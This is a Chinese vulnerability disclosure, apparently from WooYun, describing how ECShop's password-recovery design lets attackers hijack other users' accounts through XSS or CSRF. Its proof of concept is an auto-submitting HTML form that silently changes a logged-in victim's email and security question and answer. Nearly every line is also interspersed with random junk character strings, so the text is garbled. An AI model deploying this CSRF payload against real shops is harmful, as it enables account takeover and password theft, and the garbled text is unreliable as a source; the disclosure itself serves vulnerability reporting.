简要描述:: U8 L# c4 W; ]1 Z- I& x5 @( |
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
, w4 k: i; m* R# c( _/ l/ d
* ^: O' q: }( q( {- xDemo For:http://www.wooyun.org/bug.php?action=view&id=395
) A+ _9 r5 X% R9 o& v# B- ^! k. q2 Y; l4 U( s: c
详细说明:7 [4 y( Y0 Y6 n* {4 Z+ G+ D- Y* H* Z
利用csrf和xss可以突破官方所说的“障碍”6 L# q; u8 L7 m! f2 X/ w
xss版本已经有人说明
5 P+ b, H4 k3 O; e/ G5 p这里给出csrf版本& P6 I3 h* g+ ]( Y# n6 y0 v( b
9 z: |/ E Y: D/ D. B* Q) m# O漏洞证明:1 _* H5 w( h1 Y$ I
<html>) u3 X, t1 }- w9 m3 O) W" x
<body>7 a" [5 X* V- R ~8 I* ~! T
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
) | x3 O( Z! d% _4 _1 ~<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
: S* ]# E; T7 X8 h<INPUT TYPE="text" NAME="act" value="act_edit_profile"> O, H% |( d5 [0 `
<INPUT TYPE="text" NAME="sel_question" value="ecshop">- E$ D7 Y3 v. \8 M) U6 ?* ?+ L7 o
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">: ^3 i3 {0 y+ E* j, X( |" c
</body>$ R: q8 I: m- Z
<script>
4 \' S3 r, E, b* D' odocument.forms[0].submit();/ |9 Y% t+ ~3 P: F) @& W3 h
</script>
1 F4 |5 P2 o% E/ C; S7 z3 c, i2 z</html>
9 B3 o5 K: |. q5 Y; a: ^构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
- K% G. s2 T4 c. H: {/ p* @3 G, @$ f
|